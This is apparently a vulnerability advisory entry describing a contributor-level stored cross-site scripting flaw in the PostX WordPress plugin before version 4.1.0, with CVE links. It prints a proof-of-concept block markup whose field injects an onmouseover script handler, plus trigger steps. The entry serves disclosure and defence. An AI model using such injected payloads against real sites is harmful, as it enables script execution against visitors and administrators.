Lucene search
Dmitrii IgnatyevWPEX-ID:635BE98D-4C17-4E75-871F-9794D85A2EB1HistoryMay 27, 2024 - 12:00 a.m.
PostX < 4.1.0 - Contributor+ Stored XSS
2024-05-2700:00:00
Dmitrii Ignatyev
16
postx contributor+ stored xss
poc
june 10 2024
exploit
8.3 High
AI Score
Confidence
High
Description The plugin does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
As a contributor, put the below code in a post while in Code Editor mode
<!-- wp:ultimate-post/post-grid-3 {"blockId":"d57ca5","currentPostId":"2198","filterShow":true,"paginationShow":true,"readMore":true,"contentTag":"section","openInTab":true,"headingText":"123","headingURL":"123","headingTag":"h5","titleTag":"h6","metaMinText":"123","metaAuthorPrefix":"123","fallbackImg":{"url":"123","id":99999},"readMoreText":"123","filterText":"ClickMe!","filterMobileText":"\u0022onmouseover='alert(/XSS/)'","loadMoreText":"123"} /-->
The XSS will be triggered when (pre)viewing the post and moving the mouse over the ClickMe! textReferences
Related
nvd
nvd
CVE-2024-4305
2024-06-17 06:15:09
CVE-2024-5758
2024-06-08 07:15:08
cve
cve
CVE-2024-4305
2024-06-17 06:15:09
CVE-2024-5758
2024-06-08 07:15:08
cvelist
cvelist
CVE-2024-4305 PostX < 4.1.0 - Contributor+ Stored XSS
2024-06-17 06:00:01
wpvulndb
wpvulndb
wordfence
wordfence